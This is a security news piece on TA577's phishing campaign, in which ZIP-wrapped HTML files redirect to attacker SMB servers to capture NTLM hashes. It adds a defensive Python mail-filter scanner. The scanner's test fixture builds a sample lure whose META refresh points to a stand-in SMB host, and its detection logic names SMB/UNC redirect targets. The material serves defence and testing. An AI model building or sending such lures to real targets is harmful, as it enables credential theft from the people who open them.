TA577 changes tactics: Phishing emails to steal NTLM hashes

Teacher

It remains to be seen what the group's new technique will lead to.

Security firm Proofpoint has found that the TA577 group has changed tactics: it is now sending phishing emails designed to steal NT LAN Manager (NTLM) authentication hashes, which can then be used to take over accounts.

In two waves on February 26 and 27, 2024, the group sent thousands of emails to hundreds of organizations around the world with the aim of stealing employees' NTLM hashes.

Windows uses NTLM for authentication and session security. Stolen hashes can be cracked offline to recover the password, or used in "pass-the-hash" attacks that authenticate to remote servers without ever recovering the plaintext password. One caveat worth keeping in mind: what an attacker-controlled SMB server captures when a victim connects is the NTLMv2 challenge-response (often called a Net-NTLMv2 hash), not the NT hash stored on the domain controller. A challenge-response can be cracked offline or relayed to another server that does not require SMB signing, but it cannot be replayed directly in a pass-the-hash attack.

The phishing emails are crafted to look like replies to a message the victim sent earlier, a technique known as thread hijacking. Each email carries a ZIP archive that is unique to the recipient and contains an HTML file; the HTML file uses a META refresh tag to redirect automatically to a text file hosted on an attacker-controlled SMB server. When the victim's Windows machine tries to fetch that file, it authenticates to the server and hands over the NTLM hash.

Proofpoint notes that the HTML files were packed into archives in order to bypass protections in email clients updated after July 2023. It also stresses that the goal of the campaign is to capture NTLM hashes, not to deliver malware.

Experts point out that using the stolen hashes against a network requires that multi-factor authentication (MFA) not be enabled on the targeted accounts. They also suggest that hash theft may serve as a form of reconnaissance to identify high-value victims.

Recommended mitigations include configuring email filtering to block messages carrying archives that contain HTML files, and configuring the firewall to block outbound SMB connections (typically TCP ports 445 and 139). For Windows 11, Microsoft has also introduced a security option that blocks NTLM-based attacks over SMB.
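As an added illustration of both the lure described above (a ZIP containing an HTML file whose META refresh tag points at an SMB server) and the attachment-filtering recommendation, here is a small Python scanner that opens an archive in memory, extracts every META refresh target from the HTML files inside, and classifies targets that would make a Windows client open an outbound SMB connection (UNC paths, file:// URLs with a host, smb:// URLs). This is example code written for this page, not Proofpoint's tooling or anything from the TA577 campaign; the sample archives, file names and the 203.0.113.10 host are constructed for the demonstration.

```python
import io
import re
import zipfile
from html.parser import HTMLParser

_HTML_EXT = (".htm", ".html", ".shtml")
_DRIVE = re.compile(r"^[A-Za-z]:")


def is_remote_smb_target(url: str) -> bool:
    """True if following this URL makes a Windows client talk SMB to a remote host."""
    u = url.strip().strip("'\"")
    low = u.lower()
    if low.startswith("smb://") or low.startswith("\\\\"):
        return True                      # smb://host/share or \\host\share
    if low.startswith("file:"):
        rest = u[5:].lstrip("/\\")       # file:///C:/x -> "C:/x"; file://///host/share -> "host/share"
        return rest != "" and not _DRIVE.match(rest)
    return False


class _MetaRefreshCollector(HTMLParser):
    """Collects the url= part of every <meta http-equiv="refresh" content="N; url=..."> tag."""

    def __init__(self) -> None:
        super().__init__()
        self.targets: list[str] = []

    def handle_starttag(self, tag, attrs):
        if tag.lower() != "meta":
            return
        a = {k.lower(): (v or "") for k, v in attrs}   # attribute order does not matter
        if a.get("http-equiv", "").strip().lower() != "refresh":
            return
        m = re.search(r"url\s*=\s*(.+)$", a.get("content", ""), re.IGNORECASE | re.DOTALL)
        if m:
            self.targets.append(m.group(1).strip().strip("'\""))


def meta_refresh_targets(html: str) -> list[str]:
    p = _MetaRefreshCollector()
    p.feed(html)
    p.close()
    return p.targets


def scan_zip_attachment(data: bytes) -> list[dict]:
    """Return one finding per META refresh target found in HTML files inside the archive."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        for info in zf.infolist():
            if info.is_dir() or not info.filename.lower().endswith(_HTML_EXT):
                continue
            html = zf.read(info).decode("utf-8", errors="replace")
            for target in meta_refresh_targets(html):
                findings.append({"file": info.filename, "target": target,
                                 "smb": is_remote_smb_target(target)})
    return findings


def archive_has_html(data: bytes) -> bool:
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        return any(not i.is_dir() and i.filename.lower().endswith(_HTML_EXT) for i in zf.infolist())


def verdict(data: bytes) -> str:
    """Mail-filter decision: SMB redirect -> block; any HTML in an archive -> quarantine."""
    if any(f["smb"] for f in scan_zip_attachment(data)):
        return "block: HTML meta refresh to SMB/UNC target"
    if archive_has_html(data):
        return "quarantine: archive contains HTML file"
    return "allow"


def _zip_of(name: str, body: str) -> bytes:
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr(name, body)
    return buf.getvalue()


def build_sample_lure() -> bytes:
    """Constructed sample mimicking the described lure (host, share and file names are made up)."""
    html = ('<html><head><meta http-equiv="refresh" '
            'content="0; url=file://///203.0.113.10/share/msg.txt"></head>'
            '<body>Loading...</body></html>')
    return _zip_of("Re_Invoice_1234.html", html)


def build_benign_redirect() -> bytes:
    """Constructed HTML attachment that only redirects to an https:// URL."""
    return _zip_of("page.html", '<meta content="0;URL=https://example.com/" http-equiv="refresh">')


def build_plain_archive() -> bytes:
    """Constructed archive with no HTML at all."""
    return _zip_of("notes.txt", "nothing to see here")


if __name__ == "__main__":
    for label, blob in (("lure", build_sample_lure()),
                        ("benign", build_benign_redirect()),
                        ("plain", build_plain_archive())):
        print(label, "->", verdict(blob), scan_zip_attachment(blob))
```

The classifier deliberately treats any file:// URL with a host component as remote, however many slashes precede the host, because Windows resolves those to a UNC path and will attempt SMB (and NTLM) to reach it; a file:///C:/... URL with a drive letter stays local and is not flagged.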